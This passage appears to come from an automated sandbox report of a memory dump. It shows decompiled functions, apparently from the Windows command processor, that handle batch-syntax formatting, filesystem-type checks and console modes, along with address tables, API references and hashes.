0x0033ee99
0x0033ee99
0x0033ee6b
0x0033ee7a
0x0033ee7c
0x0033ee7c
0x0033ee80
0x0033ee80
0x0033ee82
0x00000000
0x00000000
0x0033ee84
0x0033ee88
0x0033ee8b
0x00000000
0x0033ee8d
0x0033ee8d
0x0033ee90
0x0033ee91
0x0033ee94
0x0033ee94
0x0033ee97
0x00000000
0x00000000
0x00000000
0x00000000
0x0033ee97
0x00000000
0x0033ee8b
0x0033ee9e
0x0033eea0
0x00000000
0x00000000
0x0033eea0
0x0033eea2
0x0033eea2
0x0033eea5
0x0033eea7
0x0033eea7
0x0033eeaa
0x0033eda4
0x0033eda4
0x0033eda4
0x0033eda9
0x0033edab
0x00000000
0x00000000
0x0033edb2
0x0033edb7
0x0033edbc
0x0033ede9
0x0033edec
0x0033edf2
0x0033edf4
0x00000000
0x00000000
0x00000000
0x0033edbe
0x0033edbe
0x0033edc3
0x0033edc8
0x0033edca
0x0033eeb2
0x0033eeb4
0x0033eeb4
0x0033eeb4
0x0033eeb7
0x0033eeb9
0x0033eebc
0x0033eebc
0x0033eec0
0x00000000
0x0033edd0
0x0033edd3
0x0033edd5
0x0033edd5
0x0033edca
0x00000000
0x0033edbc
0x0033edde
0x0033ede8
0x0033ebcb
0x0033ebcb
0x0033ebdb
0x0033ebdb
0x0033ebc5
0x0033eaf4
0x0033ea8a
0x00000000

APIs

wcschr.MSVCRT ref: 0033EAB7
iswspace.MSVCRT ref: 0033EB2D
wcschr.MSVCRT ref: 0033EB49
wcschr.MSVCRT ref: 0033EB6D
wcschr.MSVCRT ref: 0033EBFD
iswspace.MSVCRT ref: 0033EC37
wcschr.MSVCRT ref: 0033EC4F
wcschr.MSVCRT ref: 0033EC9C
longjmp.MSVCRT(0036B8B8,00000001,00000000,?,?), ref: 0034C049
longjmp.MSVCRT(0036B8B8,00000001), ref: 0034C05B

Strings

=,;, xrefs: 0033EA96

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: wcschr$iswspacelongjmp
String ID: =,;
API String ID: 4008636219-1539845467
Opcode ID: a2ee62802ad250ca8bef0114cbfaf551ba625a3d14ab58cb4d628a7334381268
Instruction ID: 4d1b5a317fb308a15009299657bd38138be5d07ec4dcf6a454d58be010a94411
Opcode Fuzzy Hash: a2ee62802ad250ca8bef0114cbfaf551ba625a3d14ab58cb4d628a7334381268
Instruction Fuzzy Hash: AFD1F675A00215CBDB369F68D8C57BAB3F9AF40305F16446AEC4AAB2D0EB74DD84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00339835, Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00339835(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
				void* _v8;
				void* __ebx;
				void* __ebp;
				intOrPtr _t76;
				intOrPtr _t87;
				intOrPtr _t90;
				signed int _t91;
				signed char _t103;
				signed int _t107;
				intOrPtr _t108;
				signed int _t125;
				signed int _t144;
				intOrPtr* _t179;
				void* _t182;

				_t153 = __edx;
				_t123 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t179 = __ecx;
				_t114 = 0;
				_t182 = __edx;
				_v8 = 0;
				_t76 =  *__ecx;
				if(_t76 > 0x37) {
					__eflags = _t76 - 0x38;
					if(__eflags == 0) {
						E00339899(0, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						L78:
						_t125 =  *(_t179 + 0x3c);
						L79:
						E00339835(_t125, _t182, _a4);
						L7:
						return 0;
					}
					if(__eflags <= 0) {
						L54:
						__imp__longjmp(0x36b8f8, 0xffffffff);
						L55:
						E00339899(_t114, _a4, "(", _t114);
						_v8 = ")";
						L60:
						E00339835( *((intOrPtr*)(_t179 + 0x38)), _t182, _a4);
						_t60 =  &_v8; // 0x332168
						E00339899(_t114, _a4,  *_t60, _t114);
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L7;
						}
						__eflags =  *_t179 - 0x3b;
						if( *_t179 == 0x3b) {
							goto L7;
						}
						goto L78;
					}
					__eflags = _t76 - 0x3a;
					if(_t76 <= 0x3a) {
						_v8 = L"== ";
						__eflags =  *0x373cc9;
						if( *0x373cc9 != 0) {
							_t87 =  *((intOrPtr*)(__ecx + 0x44));
							__eflags = _t87 - 1;
							if(_t87 != 1) {
								__eflags = _t87 - 2;
								if(_t87 != 2) {
									__eflags = _t87 - 3;
									if(_t87 != 3) {
										__eflags = _t87 - 4;
										if(_t87 != 4) {
											__eflags = _t87 - 5;
											if(_t87 != 5) {
												__eflags = _t87 - 6;
												if(_t87 == 6) {
													_v8 = L"GEQ ";
												}
											} else {
												_v8 = L"GTR ";
											}
										} else {
											_v8 = L"LEQ ";
										}
									} else {
										_v8 = L"LSS ";
									}
								} else {
									_v8 = L"NEQ ";
								}
							} else {
								_v8 = L"EQU ";
							}
						}
						E00339899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)), 1);
						_t114 = 0;
						_push(0);
						_push(_v8);
						L4:
						E00339899(_t114, _a4);
						if( *(_t179 + 0x3c) != _t114) {
							E00339899(_t114, _a4,  *(_t179 + 0x3c), _t114);
						}
						E00339CA6(_t179, _t182, _a4);
						goto L7;
					}
					__eflags = _t76 - 0x3b;
					if(_t76 == 0x3b) {
						L13:
						E00339CA6(_t123, _t153, _a4);
						_t114 = 1;
						__eflags =  *_t179 - 0x2e;
						if( *_t179 < 0x2e) {
							goto L60;
						}
						__eflags =  *_t179 - 0x2f;
						if( *_t179 <= 0x2f) {
							_v8 = "&";
							goto L60;
						}
						__eflags =  *_t179 - 0x30;
						if( *_t179 == 0x30) {
							_v8 = L"||";
							goto L60;
						}
						__eflags =  *_t179 - 0x31;
						if( *_t179 == 0x31) {
							_v8 = L"&&";
							goto L60;
						}
						__eflags =  *_t179 - 0x32;
						if( *_t179 == 0x32) {
							_v8 = "|";
							goto L60;
						}
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L55;
						} else {
							__eflags =  *_t179 - 0x3b;
							if( *_t179 == 0x3b) {
								E00339899(1, _a4, "@", 1);
								_v8 = " ";
							}
							goto L60;
						}
					}
					__eflags = _t76 - 0x3c;
					if(_t76 != 0x3c) {
						goto L54;
					}
					_t90 =  *0x378510;
					__eflags = _t90 - 0x2396;
					if(_t90 != 0x2396) {
						__eflags = _t90 - 0x2395;
						if(_t90 != 0x2395) {
							__eflags = _t90 - 0x2390;
							if(_t90 != 0x2390) {
								goto L54;
							}
							_t91 = L"REM /?";
							L53:
							E00339899(_t114, _a4, _t91, 1);
							goto L7;
						}
						_t91 = L"IF /?";
						goto L53;
					}
					_t91 = L"FOR /?";
					goto L53;
				}
				if(_t76 >= 0x34 || _t76 == 0) {
					L3:
					_push(1);
					_push( *((intOrPtr*)(_t179 + 0x38)));
					goto L4;
				} else {
					__eflags = _t76 - 0x2b;
					if(_t76 == 0x2b) {
						E00339899(1, _a4, L"FOR", 1);
						__eflags =  *0x373cc9;
						if( *0x373cc9 == 0) {
							L41:
							E00339899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 6, 1);
							E00339899(1, _a4, "(", 1);
							E00339899(1, _a4,  *(_t179 + 0x3c), 0);
							E00339899(1, _a4, ")", 0);
							E00339899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 0x2c, 1);
							_t125 =  *(_t179 + 0x40);
							goto L79;
						}
						_t103 =  *(__ecx + 0x48);
						__eflags = 1 & _t103;
						if((1 & _t103) == 0) {
							__eflags = _t103 & 0x00000002;
							if((_t103 & 0x00000002) == 0) {
								__eflags = _t103 & 0x00000008;
								if((_t103 & 0x00000008) == 0) {
									__eflags = _t103 & 0x00000004;
									if((_t103 & 0x00000004) == 0) {
										goto L41;
									}
									_push(1);
									_push(L"/R");
									L38:
									E00339899(1, _a4);
									__eflags =  *(_t179 + 0x4c);
									if( *(_t179 + 0x4c) == 0) {
										goto L41;
									}
									_push(1);
									_push( *(_t179 + 0x4c));
									goto L40;
								}
								_push(1);
								_push(L"/F");
								goto L38;
							}
							_push(1);
							_push(L"/D");
							goto L40;
						} else {
							_push(1);
							_push(L"/L");
							L40:
							E00339899(1, _a4);
							goto L41;
						}
					}
					__eflags = _t76 - 0x2c;
					if(_t76 == 0x2c) {
						E00339899(1, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						_t107 =  *(__ecx + 0x3c);
						_t144 = 0;
						__eflags =  *_t107 - 0x38;
						if( *_t107 == 0x38) {
							_t108 =  *((intOrPtr*)(_t107 + 0x3c));
							__eflags =  *((intOrPtr*)(_t108 + 0x40)) - 2;
							_t107 =  *(__ecx + 0x3c);
							if( *((intOrPtr*)(_t108 + 0x40)) == 2) {
								_t144 = L"/I";
							}
						} else {
							asm("sbb ecx, ecx");
							_t144 =  !( ~( *((intOrPtr*)(_t107 + 0x40)) - 2)) & L"/I";
						}
						__eflags = _t144;
						if(_t144 != 0) {
							E00339899(1, _a4, _t144, 1);
							_t107 =  *(_t179 + 0x3c);
						}
						E00339835(_t107, _t182, _a4);
						E00339835( *(_t179 + 0x40), _t182, _a4);
						__eflags =  *(_t179 + 0x48);
						if( *(_t179 + 0x48) == 0) {
							goto L7;
						} else {
							E00339899(1, _a4,  *((intOrPtr*)(_t179 + 0x44)), 1);
							_t125 =  *(_t179 + 0x48);
							goto L79;
						}
					}
					__eflags = _t76 - 0x2d;
					if(__eflags == 0) {
						goto L3;
					}
					if(__eflags <= 0) {
						goto L54;
					}
					__eflags = _t76 - 0x33;
					if(_t76 > 0x33) {
						goto L54;
					}
					goto L13;
				}
			}

0x00339835
0x00339835
0x0033983a
0x0033983b
0x0033983f
0x00339841
0x00339843
0x00339845
0x00339848
0x0033984d
0x00350ed1
0x00350ed4
0x00351036
0x0035103b
0x0035103b
0x0035103e
0x00351043
0x0033988e
0x00339896
0x00339896
0x00350eda
0x00350f32
0x00350f39
0x00350f3f
0x00350f4a
0x00350f4f
0x00350f7a
0x00350f82
0x00350f8d
0x00350f90
0x00350f95
0x00350f98
0x00000000
0x00000000
0x00350f9e
0x00350fa1
0x00000000
0x00000000
0x00000000
0x00350fa7
0x00350edc
0x00350edf
0x00350fae
0x00350fb6
0x00350fbd
0x00350fbf
0x00350fc2
0x00350fc4
0x00350fcf
0x00350fd2
0x00350fdd
0x00350fe0
0x00350feb
0x00350fee
0x00350ff9
0x00350ffc
0x00351007
0x0035100a
0x0035100c
0x0035100c
0x00350ffe
0x00350ffe
0x00350ffe
0x00350ff0
0x00350ff0
0x00350ff0
0x00350fe2
0x00350fe2
0x00350fe2
0x00350fd4
0x00350fd4
0x00350fd4
0x00350fc6
0x00350fc6
0x00350fc6
0x00350fc4
0x0035101c
0x00351021
0x00351023
0x00351024
0x00339865
0x0033986a
0x00339872
0x0033987d
0x0033987d
0x00339889
0x00000000
0x00339889
0x00350ee5
0x00350ee8
0x00350d18
0x00350d1b
0x00350d22
0x00350d23
0x00350d26
0x00000000
0x00000000
0x00350d2c
0x00350d2f
0x00350f73
0x00000000
0x00350f73
0x00350d35
0x00350d38
0x00350f6a
0x00000000
0x00350f6a
0x00350d3e
0x00350d41
0x00350f61
0x00000000
0x00350f61
0x00350d47
0x00350d4a
0x00350f58
0x00000000
0x00350f58
0x00350d50
0x00350d53
0x00000000
0x00350d59
0x00350d59
0x00350d5c
0x00350d6d
0x00350d72
0x00350d72
0x00000000
0x00350d5c
0x00350d53
0x00350eee
0x00350ef1
0x00000000
0x00000000
0x00350ef3
0x00350ef8
0x00350efd
0x00350f06
0x00350f0b
0x00350f14
0x00350f19
0x00000000
0x00000000
0x00350f1b
0x00350f20
0x00350f28
0x00000000
0x00350f28
0x00350f0d
0x00000000
0x00350f0d
0x00350eff
0x00000000
0x00350eff
0x00339856
0x00339860
0x00339860
0x00339862
0x00000000
0x00350cf2
0x00350cf2
0x00350cf5
0x00350e18
0x00350e1d
0x00350e24
0x00350e75
0x00350e82
0x00350e92
0x00350ea1
0x00350eb2
0x00350ec4
0x00350ec9
0x00000000
0x00350ec9
0x00350e26
0x00350e29
0x00350e2b
0x00350e35
0x00350e37
0x00350e41
0x00350e43
0x00350e4d
0x00350e4f
0x00000000
0x00000000
0x00350e51
0x00350e52
0x00350e57
0x00350e5c
0x00350e61
0x00350e65
0x00000000
0x00000000
0x00350e67
0x00350e68
0x00000000
0x00350e68
0x00350e45
0x00350e46
0x00000000
0x00350e46
0x00350e39
0x00350e3a
0x00000000
0x00350e2d
0x00350e2d
0x00350e2e
0x00350e6b
0x00350e70
0x00000000
0x00350e70
0x00350e2b
0x00350cfb
0x00350cfe
0x00350d8a
0x00350d8f
0x00350d92
0x00350d94
0x00350d97
0x00350dad
0x00350db0
0x00350db4
0x00350db7
0x00350db9
0x00350db9
0x00350d99
0x00350da1
0x00350da5
0x00350da5
0x00350dbe
0x00350dc0
0x00350dc9
0x00350dce
0x00350dce
0x00350dd8
0x00350de5
0x00350dea
0x00350dee
0x00000000
0x00350df4
0x00350dfd
0x00350e02
0x00000000
0x00350e02
0x00350dee
0x00350d00
0x00350d03
0x00000000
0x00000000
0x00350d09
0x00000000
0x00000000
0x00350d0f
0x00350d12
0x00000000
0x00000000
0x00000000
0x00350d12

Strings

GTR , xrefs: 00350FFE
LEQ , xrefs: 00350FF0
h!3, xrefs: 00350F8D, 00351024
GEQ , xrefs: 0035100C
== , xrefs: 00350FAE
FOR /?, xrefs: 00350EFF
NEQ , xrefs: 00350FD4
FOR, xrefs: 00350E13
REM /?, xrefs: 00350F1B
IF /?, xrefs: 00350F0D, 00350F27
LSS , xrefs: 00350FE2
EQU , xrefs: 00350FC6

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?$h!3
API String ID: 0-4194897884
Opcode ID: 9eb04b2277c6cfbb90eb479641430ae5465697a9aba7b451d8b54a98072bafd7
Instruction ID: 699dfc319e23416c09700ee1b3ffac16f441a1d41e08ae586f035789e5e13d87
Opcode Fuzzy Hash: 9eb04b2277c6cfbb90eb479641430ae5465697a9aba7b451d8b54a98072bafd7
Instruction Fuzzy Hash: 3CA10274600209FBCF3B9E55C8C5E6E7B6AFB81352F218116F8054F660C7B29D9ADB81

Uniqueness

Uniqueness Score: -1.00%

Function 0035B9D3, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0035B9D3(void* __ecx, char __edx, char _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				char _v1085;
				long _v1092;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				void* _t63;
				WCHAR* _t64;
				int _t65;
				WCHAR* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				WCHAR* _t73;
				WCHAR* _t81;
				void* _t89;
				WCHAR* _t90;
				signed int _t91;

				_t88 = __edx;
				_t41 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t41 ^ _t91;
				_v1085 = __edx;
				_t90 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t73 = 1;
				_t89 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				if(E00340C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00340C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L27:
					_t90 = _t73;
					goto L28;
				} else {
					_t63 = _v564;
					if(_t63 == 0) {
						_t63 =  &_v1084;
					}
					__imp__GetVolumePathNameW(_t89, _t63, _v556);
					if(_t63 == 0) {
						goto L27;
					} else {
						_t64 = _v564;
						if(_t64 == 0) {
							_t64 =  &_v1084;
						}
						_t65 = GetDriveTypeW(_t64);
						if(_t65 == 0 || _t65 == 4) {
							_t73 = _t90;
							goto L27;
						} else {
							_t66 = _v28;
							if(_t66 == 0) {
								_t66 =  &_v548;
							}
							_t81 = _v564;
							if(_t81 == 0) {
								_t81 =  &_v1084;
							}
							if(GetVolumeInformationW(_t81, _t90, _t90, _t90,  &_v1092,  &_v1092, _t66, _v20) == 0) {
								goto L27;
							} else {
								_t69 = _v28;
								if(_t69 == 0) {
									_t69 =  &_v548;
								}
								__imp___wcsicmp(_t69, L"NTFS");
								if(_t69 != 0) {
									if(_a4 == 0) {
										L21:
										if(_v1085 == 0) {
											L28:
											_t73 = _t90;
										} else {
											_t70 = _v28;
											if(_t70 == 0) {
												_t70 =  &_v548;
											}
											__imp___wcsicmp(_t70, L"CSVFS");
											if(_t70 != 0) {
												goto L28;
											} else {
											}
										}
									} else {
										_t71 = _v28;
										if(_t71 == 0) {
											_t71 =  &_v548;
										}
										__imp___wcsicmp(_t71, L"REFS");
										if(_t71 != 0) {
											goto L21;
										}
									}
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v564);
				__imp__??_V@YAXPAX@Z();
				return E00346FD0(_t73, _t73, _v8 ^ _t91, _t88, _t89, _t90, _v28);
			}

0x0035b9d3
0x0035b9de
0x0035b9e5
0x0035b9f0
0x0035b9f7
0x0035b9f9
0x0035b9fe
0x0035ba07
0x0035ba0a
0x0035ba0c
0x0035ba0f
0x0035ba17
0x0035ba22
0x0035ba28
0x0035ba37
0x0035ba60
0x0035bb85
0x0035bb85
0x00000000
0x0035ba90
0x0035ba90
0x0035ba98
0x0035ba9a
0x0035ba9a
0x0035baa8
0x0035bab0
0x00000000
0x0035bab6
0x0035bab6
0x0035babe
0x0035bac0
0x0035bac0
0x0035bac7
0x0035bacf
0x0035bb83
0x00000000
0x0035bade
0x0035bade
0x0035bae3
0x0035bae5
0x0035bae5
0x0035baeb
0x0035baf3
0x0035baf5
0x0035baf5
0x0035bb13
0x00000000
0x0035bb15
0x0035bb15
0x0035bb1a
0x0035bb1c
0x0035bb1c
0x0035bb28
0x0035bb32
0x0035bb38
0x0035bb59
0x0035bb60
0x0035bb87
0x0035bb87
0x0035bb62
0x0035bb62
0x0035bb67
0x0035bb69
0x0035bb69
0x0035bb75
0x0035bb7f
0x00000000
0x00000000
0x0035bb81
0x0035bb7f
0x0035bb3a
0x0035bb3a
0x0035bb3f
0x0035bb41
0x0035bb41
0x0035bb4d
0x0035bb57
0x00000000
0x00000000
0x0035bb57
0x0035bb38
0x0035bb32
0x0035bb13
0x0035bacf
0x0035bab0
0x0035bb8f
0x0035bb99
0x0035bbb2

APIs

memset.MSVCRT ref: 0035BA0F
memset.MSVCRT ref: 0035BA37

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 0035BAA8
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 0035BAC7
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 0035BB0B
_wcsicmp.MSVCRT ref: 0035BB28
_wcsicmp.MSVCRT ref: 0035BB4D
_wcsicmp.MSVCRT ref: 0035BB75
??_V@YAXPAX@Z.MSVCRT ref: 0035BB8F
??_V@YAXPAX@Z.MSVCRT ref: 0035BB99

Strings

REFS, xrefs: 0035BB47
CSVFS, xrefs: 0035BB6F
NTFS, xrefs: 0035BB22

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
String ID: CSVFS$NTFS$REFS
API String ID: 3510147486-2605508654
Opcode ID: f3ed8b2ceeec128e0302b6e3d4dc89a14e612a51809cd6ea3da30db2c832fa66
Instruction ID: acac7af4f58f65f072d0193ad907a1169d88922546dd73ae42535607cb99cced
Opcode Fuzzy Hash: f3ed8b2ceeec128e0302b6e3d4dc89a14e612a51809cd6ea3da30db2c832fa66
Instruction Fuzzy Hash: 24513671A042199BDF22CBA5DC89FEABBBCEB04355F04019AF909D7151DB74DE84CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00339520, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 003395E4
_wcsicmp.MSVCRT ref: 003395F6
_wcsicmp.MSVCRT ref: 00339608
_wcsicmp.MSVCRT ref: 0033961A
_wcsicmp.MSVCRT ref: 0033962C
_wcsicmp.MSVCRT ref: 00339682

Strings

NEQ, xrefs: 003395F0
LEQ, xrefs: 00339614
LSS, xrefs: 00339602
EQU, xrefs: 003395DE
GEQ, xrefs: 0033967C
GTR, xrefs: 00339626

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsicmp
String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
API String ID: 2081463915-3124875276
Opcode ID: 24b81bf36e4b8ae864fa4bc53d136f466af6dadc973c32a94129616ed9848eed
Instruction ID: 1001fac9a8708cd0d84f8f256d19ad8c34352a18459a9207125191009be5bf26
Opcode Fuzzy Hash: 24b81bf36e4b8ae864fa4bc53d136f466af6dadc973c32a94129616ed9848eed
Instruction Fuzzy Hash: E341F231201702CAF7276B24ECE6B67B7ACAB55731F21452FE106965E0EFF29584CB10

Uniqueness

Uniqueness Score: -1.00%

Function 003406C0, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E003406C0(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t15;
				void* _t16;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t28;
				signed int _t29;
				void* _t30;
				void* _t32;

				_t4 =  *0x35d0b4; // 0xd59bd0e8
				_t5 = _t4 ^ _t29;
				_v8 = _t5;
				__imp___get_osfhandle( *0x363880, __ecx);
				_t6 = SetConsoleMode(_t5, 1);
				__imp___get_osfhandle(0x363880);
				_t32 = _t30 + 8;
				_t7 = GetConsoleMode(_t6, 1);
				if(_t7 == 0) {
					L2:
					__imp___get_osfhandle(0x363884);
					if(GetConsoleMode(_t7, 0) != 0) {
						_t20 =  *0x363884;
						_t8 = _t20 & 0x00000017;
						if(_t8 != 7) {
							_t23 = _t20 & 0xffffffef | 0x00000007;
							 *0x363884 = _t23;
							__imp___get_osfhandle(_t23);
							_t8 = SetConsoleMode(_t8, 0);
						}
						_push(_t27);
						_t28 =  *0x363888;
						if(_t28 != 0) {
							 *0x3794b4(L"CMD.EXE");
							_t8 =  *_t28();
						}
						_pop(_t27);
					}
					return E00346FD0(_t8, _t16, _v8 ^ _t29, _t25, _t26, _t27);
				}
				_t24 =  *0x35d0e0; // 0x7
				_t25 =  *0x363880;
				_t7 = _t24 & _t25;
				if(_t7 != _t24) {
					_t25 = _t25 | _t24;
					 *0x363880 = _t25;
					__imp___get_osfhandle(_t25);
					_t32 = _t32 + 4;
					_t7 = SetConsoleMode(_t7, 1);
					if(_t7 != 0) {
						goto L2;
					}
					_t7 =  *0x35d0e0; // 0x7
					if((_t7 & 0x00000004) != 0) {
						 *0x35d0e0 = _t7 & 0xfffffffb;
						_t15 =  *0x363880 & 0xfffffffb;
						 *0x363880 = _t15;
						__imp___get_osfhandle(_t15);
						_t32 = _t32 + 4;
						_t7 = SetConsoleMode(_t15, 1);
					}
				}
				goto L2;
			}

0x003406c6
0x003406cb
0x003406cd
0x003406d8
0x003406e2
0x003406ef
0x003406f5
0x003406f9
0x00340701
0x00340717
0x0034071e
0x00340730
0x00340732
0x0034073a
0x0034073f
0x00340744
0x0034074a
0x00340750
0x0034075a
0x0034075a
0x00340760
0x00340761
0x00340769
0x00340772
0x00340778
0x00340778
0x0034077a
0x0034077a
0x00340788
0x00340788
0x00340703
0x0034070b
0x00340711
0x00340715
0x00340789
0x0034078e
0x00340794
0x0034079a
0x0034079e
0x003407a6
0x00000000
0x00000000
0x0034cc03
0x0034cc0a
0x0034cc13
0x0034cc1d
0x0034cc23
0x0034cc28
0x0034cc2e
0x0034cc32
0x0034cc32
0x0034cc0a
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 003406D8
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,003538A5), ref: 003406E2
_get_osfhandle.MSVCRT ref: 003406EF
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 003406F9
_get_osfhandle.MSVCRT ref: 0034071E
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00340728
_get_osfhandle.MSVCRT ref: 00340750
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0034075A
_get_osfhandle.MSVCRT ref: 00340794
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0034079E
_get_osfhandle.MSVCRT ref: 0034CC28
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0034CC32

Strings

CMD.EXE, xrefs: 0034076B

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ConsoleMode_get_osfhandle
String ID: CMD.EXE
API String ID: 1606018815-3025314500
Opcode ID: 794ca00ad437803f81e8af16a2662557eace2f2b667d71b176379f8a89f27021
Instruction ID: 7a29b2a7d1c38bd61998bc9f9b3cb5034e4ce3949c892afb3898fd7d4f850ae3
Opcode Fuzzy Hash: 794ca00ad437803f81e8af16a2662557eace2f2b667d71b176379f8a89f27021
Instruction Fuzzy Hash: 1831B6B1700600ABE72B9B64EC0AB6A3BFCFB40715F044629F50ACB2E1D775B9448A42

Uniqueness

Uniqueness Score: -1.00%

Function 0033C6F4, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 147
windowCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0033C6F4(long __ecx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				char _v40;
				short _v104;
				void* _v108;
				long _v112;
				char* _v116;
				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				signed int _t26;
				char* _t31;
				void* _t37;
				char* _t45;
				intOrPtr _t48;
				WCHAR* _t55;
				void* _t56;
				signed int _t57;
				signed int _t59;
				long _t60;
				void* _t61;
				int _t62;
				signed int _t63;

				_t22 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t22 ^ _t63;
				_t47 = _a8;
				_t60 = __ecx;
				_v108 = _a8;
				_t62 = 0;
				_v112 = __ecx;
				if(__ecx == 0x13d || FormatMessageW(0x1a00, 0, __ecx, 0, 0x36b980, 0x2000, 0) == 0) {
					__imp___ultoa(_t60,  &_v40, 0x10);
					_t26 = E00340638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(_t62,  ~( ~_t26),  &_v40, 0xffffffff,  &_v104, 0x20);
					_v120 =  &_v104;
					_t31 = L"Application";
					if(_t60 < 0x2328) {
						_t31 = L"System";
					}
					_v116 = _t31;
					_push( &_v120);
					_push(0x2000);
					_push(0x36b980);
					_push(_t62);
					_push(0x13d);
					_push(_t62);
					_push(0x3000);
					goto L6;
				} else {
					_t55 = 0x36b980;
					_t48 = 0x25;
					while(1) {
						_t58 = _t48;
						_t37 = E0033D7D4(_t55, _t48);
						_t56 = _t37;
						if(_t56 == 0) {
							break;
						}
						_t55 = _t56 + 2;
						_t59 =  *_t55 & 0x0000ffff;
						if(_t59 - 0x31 > 8) {
							if(_t59 == _t48) {
								_t55 =  &(_t55[1]);
							}
						} else {
							_t62 = _t62 + 1;
						}
					}
					_t47 = _v108;
					if(_t62 > _a4) {
						_t47 = HeapAlloc(GetProcessHeap(), 0, _t62 << 2);
						if(_t47 == 0) {
							L8:
							return E00346FD0(_t34, _t47, _v8 ^ _t63, _t58, _t60, _t62);
						}
						_t57 = 0;
						if(_t62 == 0) {
							L21:
							_t62 = FormatMessageW(0x3800, 0, _t60, 0, 0x36b980, 0x2000, _t47);
							RtlFreeHeap(GetProcessHeap(), 0, _t47);
							L7:
							_t34 = _t62;
							goto L8;
						}
						_t61 = _v108;
						_t58 = _a4;
						do {
							if(_t57 >= _t58) {
								_t45 = " ";
							} else {
								 *_t61 =  *_t61 + 4;
								_t45 =  *( *_t61 - 4);
							}
